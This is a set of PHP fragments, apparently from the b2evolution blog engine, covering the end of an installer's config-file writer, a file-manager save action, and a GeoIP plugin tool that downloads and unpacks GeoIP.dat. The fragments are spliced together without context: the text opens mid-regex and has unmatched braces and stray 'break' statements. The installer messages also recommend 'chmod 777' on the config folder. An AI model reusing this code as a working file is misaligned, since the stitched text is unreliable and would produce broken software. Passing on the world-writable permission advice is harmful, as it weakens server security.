\\s*[\'"]host[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
#ixs', "#tableprefix\\s*=\\s*'.*?';#", "#baseurl\\s*=\\s*'.*?';#", "#admin_email\\s*=\\s*'.*?';#", "#config_is_done\\s*=.*?;#"), array("\$db_config = array(\n" . "\t'user' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_user']) . "',\$1" . "\t'password' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_password']) . "',\$2" . "\t'name' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_name']) . "',\$3" . "\t'host' => '" . str_replace(array("'", "\$"), array("\\'", "\\\$"), $params['db_host']) . "',\$4", "tableprefix = '" . str_replace("'", "\\'", $params['db_tableprefix']) . "';", "baseurl = '" . str_replace("'", "\\'", $params['baseurl']) . "';", "admin_email = '" . str_replace("'", "\\'", $params['admin_email']) . "';", 'config_is_done = 1;'), $conf);
// Write new contents:
if (save_to_file($conf, $conf_filepath, 'w')) {
display_install_messages(sprintf(T_('Your configuration file <code>%s</code> has been successfully created.') . '</p>', $conf_filepath), 'success');
$tableprefix = $params['db_tableprefix'];
$baseurl = $params['baseurl'];
$admin_email = $params['admin_email'];
$config_is_done = 1;
if (!$params['quick_install']) {
// Switch to menu only on standard installation:
$action = 'menu';
}
} else {
?>
<h1><?php
echo T_('Config file update');
?>
</h1>
<p><strong><?php
printf(T_('We cannot automatically create or update your config file [%s]!'), $conf_filepath);
?>
</strong></p>
<p><?php
echo T_('There are two ways to deal with this:');
?>
</p>
<ul>
<li><strong><?php
echo T_('You can allow the installer to create the config file by changing permissions for the /conf directory:');
?>
</strong>
<ol>
<li><?php
printf(T_('Make sure there is no existing and potentially locked configuration file named <code>%s</code>. If so, please delete it.'), $conf_filepath);
?>
</li>
<li><?php
printf(T_('<code>chmod 777 %s</code>. If needed, see the <a %s>online manual about permissions</a>.'), $conf_path, 'href="' . get_manual_url('directory-and-file-permissions') . '" target="_blank"');
?>
</li>
<li><?php
echo T_('Come back to this page and refresh/reload.');
?>
</li>
</ol>
<br />
</li>
<li><strong><?php
echo T_('Alternatively, you can update the config file manually:');
?>
</strong>
<ol>
<li><?php
echo T_('Create a new text file with a text editor.');
?>
</li>
<li><?php
echo T_('Copy the contents from the box below.');
?>
</li>
<li><?php
echo T_('Paste them into your local text editor. <strong>ATTENTION: make sure there is ABSOLUTELY NO WHITESPACE after the final <code>?></code> in the file.</strong> Any space, tab, newline or blank line at the end of the conf file may prevent cookies from being set when you try to log in later.');
?>
</li>
<li><?php
echo T_('Save the file locally under the name <code>_basic_config.php</code>');
?>
</li>
<li><?php
echo T_('Upload the file to your server, into the <code>/_conf</code> folder.');
?>
</li>
<li><?php
printf(T_('<a %s>Call the installer from scratch</a>.'), 'href="index.php?locale=' . $default_locale . '"');
?>
</li>
</ol>
</li>
</ul>
<p><?php
echo T_('This is how your _basic_config.php should look like:');
?>
</p>
<blockquote>
<pre><?php
echo htmlspecialchars($conf);
?>
</pre>
</blockquote>
<?php
if (!$params['print_messages']) {
// Return all messages instead of printing on screen
$basic_config_file_result_messages = ob_get_clean();
}
return false;
}
}
if (!$params['print_messages']) {
// Return all messages instead of printing on screen
$basic_config_file_result_messages = ob_get_clean();
}
return true;
}
// Check permission!
$current_User->check_perm('files', 'edit_allowed', true, $selected_Filelist->get_FileRoot());
// Get the file we want to update:
$edited_File =& $selected_Filelist->get_by_idx(0);
// Check that the file is editable:
if (!$edited_File->is_editable($current_User->check_perm('files', 'all'))) {
$Messages->add(sprintf(T_('You are not allowed to edit «%s».'), $edited_File->dget('name')), 'error');
break;
}
param('file_content', 'html', '', false);
$fpath = $edited_File->get_full_path();
if (file_exists($fpath) && !is_writeable($fpath)) {
$Messages->add(sprintf('The file «%s» is not writable.', rel_path_to_base($fpath)), 'error');
break;
}
if (save_to_file($file_content, $fpath, 'w+')) {
$Messages->add(sprintf(T_('The file «%s» has been updated.'), $edited_File->dget('name')), 'success');
} else {
$Messages->add(sprintf(T_('The file «%s» could not be updated.'), $edited_File->dget('name')), 'error');
}
header_redirect(regenerate_url('', '', '', '&'));
// $action = 'list';
break;
}
// Do we want to display the directory tree next to the files table
$UserSettings->param_Request('fm_hide_dirtree', 'fm_hide_dirtree', 'integer', 0, true);
/**
* Filelist
*/
$fm_Filelist = new Filelist($fm_FileRoot, $ads_list_path);
$Debuglog->add('FM _rds_list_path: ' . var_export($fm_Filelist->_rds_list_path, true), 'files');
/**
* Event handler: Called when displaying the block in the "Tools" menu.
*
* @see Plugin::AdminToolPayload()
*/
function AdminToolPayload($params)
{
$action = param_action();
echo '<a name="geoip" style="position:relative;top:-60px"></a>';
switch ($action) {
case 'geoip_download':
// Display a process of downloading of GeoIP.dat
global $admin_url;
$this->print_tool_log(sprintf(T_('Downloading GeoIP.dat file from the url: %s ...'), '<a href="' . $this->geoip_download_url . '" target="_blank">' . $this->geoip_download_url . '</a>'));
// DOWNLOAD:
$gzip_contents = fetch_remote_page($this->geoip_download_url, $info, 1800);
if ($gzip_contents === false || $info['status'] != 200) {
// Downloading is Failed
if (empty($info['error'])) {
// Some unknown error
$this->print_tool_log(T_('The URL is not available. It may correspond to an old version of the GeoIP.dat file.'), 'error');
} else {
// Display an error of request
$this->print_tool_log(T_($info['error']), 'error');
}
break;
}
$this->print_tool_log(' OK.<br />');
$plugin_dir = dirname(__FILE__);
if (!is_writable($plugin_dir)) {
// Check the write rights
$this->print_tool_log(sprintf(T_('Plugin folder %s must be writable to receive GeoIP.dat. Please fix the write permissions and try again.'), '<b>' . $plugin_dir . '</b>'), 'error');
break;
}
$gzip_file_name = explode('/', $this->geoip_download_url);
$gzip_file_name = $gzip_file_name[count($gzip_file_name) - 1];
$gzip_file_path = $plugin_dir . '/' . $gzip_file_name;
if (!save_to_file($gzip_contents, $gzip_file_path, 'w')) {
// Impossible to save file...
$this->print_tool_log(sprintf(T_('Unable to create file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error');
if (file_exists($gzip_file_path)) {
// Remove file from disk
if (!@unlink($gzip_file_path)) {
// File exists without the write rights
$this->print_tool_log(sprintf(T_('Unable to remove file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error');
}
}
break;
}
// UNPACK:
$this->print_tool_log(sprintf(T_('Extracting of the file %s...'), '<b>' . $gzip_file_path . '</b>'));
if (!function_exists('gzopen')) {
// No extension
$this->print_tool_log(T_('There is no \'zip\' or \'zlib\' extension installed!'), 'error');
break;
}
if (!($gzip_handle = @gzopen($gzip_file_path, 'rb'))) {
// Try to open gzip file
$this->print_tool_log(T_('Could not open the source file!'), 'error');
break;
}
if (!($out_handle = @fopen($plugin_dir . '/' . str_replace('.gz', '', $gzip_file_name), 'w'))) {
$this->print_tool_log(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $plugin_dir . '/' . str_replace('.gz', '', $gzip_file_name) . '</b>'), 'error');
break;
}
$i = 0;
while (!gzeof($gzip_handle)) {
// Extract file by 4Kb
fwrite($out_handle, gzread($gzip_handle, 4096));
if ($i == 100) {
// Display the process dots after each 400Kb
$this->print_tool_log(' .');
$i = 0;
}
$i++;
}
$this->print_tool_log(' OK.<br />');
fclose($out_handle);
gzclose($gzip_handle);
$this->print_tool_log(sprintf(T_('Remove gzip file %s...'), '<b>' . $gzip_file_path . '</b>'));
if (@unlink($gzip_file_path)) {
$this->print_tool_log(' OK.<br />');
} else {
// Failed on removing
$this->print_tool_log(sprintf(T_('Impossible to remove the file %s. You can do it manually.'), $gzip_file_path), 'warning');
}
// Success message
$this->print_tool_log('<br /><span class="text-success">' . sprintf(T_('%s file was downloaded successfully.'), 'GeoIP.dat') . '</span>');
// Try to enable plugin automatically:
global $Plugins;
$enable_return = $this->BeforeEnable();
if ($enable_return === true) {
// Success enabling
$this->print_tool_log('<br /><span class="text-success">' . T_('The plugin has been enabled.') . '</span>');
if ($this->status != 'enabled') {
// Enable this plugin automatically:
$Plugins->set_Plugin_status($this, 'enabled');
}
} else {
// Some restriction for enabling
$this->print_tool_log('<br /><span class="text-warning">' . T_('The plugin could not be automatically enabled.') . '</span>');
if ($this->status != 'needs_config') {
// Make this plugin incomplete because it cannot be enabled:
$Plugins->set_Plugin_status($this, 'needs_config');
}
}
break;
default:
// Display a form to find countries for users
if ($this->status != 'enabled') {
// Don't allow use this tool when GeoIP plugin is not enabled
echo '<p class="error">' . T_('You must enable the GeoIP plugin before to use this tool.') . '</p>';
break;
}
$Form = new Form();
$Form->begin_form('fform');
$Form->add_crumb('tools');
$Form->hidden_ctrl();
// needed to pass the "ctrl=tools" param
$Form->hiddens_by_key(get_memorized());
// needed to pass all other memorized params, especially "tab"
$Form->hidden('action', 'geoip_find_country');
echo '<p>' . T_('This tool finds all users that do not have a registration country yet and then assigns them a registration country based on their registration IP.') . get_manual_link('geoip-plugin') . '</p>';
$Form->button(array('value' => T_('Find Registration Country for all Users NOW!')));
if (!empty($this->text_from_AdminTabAction)) {
// Display a report of executed action
echo '<p><b>' . T_('Report') . ':</b></p>';
echo $this->text_from_AdminTabAction;
}
$Form->end_form();
break;
}
}
